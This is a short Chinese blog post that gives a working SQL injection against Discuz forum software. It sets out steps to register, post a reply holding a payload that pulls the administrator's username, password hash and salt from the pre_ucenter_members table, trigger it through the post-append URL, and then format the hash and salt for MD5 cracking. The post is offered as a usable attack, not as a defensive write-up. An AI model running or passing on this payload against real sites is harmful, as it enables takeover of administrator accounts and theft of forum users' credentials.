这个漏洞早就出来了,收集在我电脑里找不到了,写到博客上好记点!

1.注册个用户,登录

2.随便找个帖子回复!

回复内容 ↓

注入语句:
a',`subject`=(/*!select*/ concat(username,'|',password,'|',salt) from pre_ucenter_members where uid=1 limit 0,1),comment='

然后到回复补充那里随便补充一下,注入语句就被执行。
补充的地址:
forum.php?mod=misc&tid=1396&action=postappend&pid=12026

爆出了管理和密码。格式是这样的: 管理|密码|XXXX

我们这时候要把  密码|XXXX         这里的  |  换成 :   就是这样  管理|密码:xxxx

 

因为dz的密码是加密的。所以后面还有一个加密。 所以去MD5解密的时候记得。MD5:XXX

转载文章请注明,转载自:小马's Blog https://www.i0day.com

本文链接: https://www.i0day.com/199.html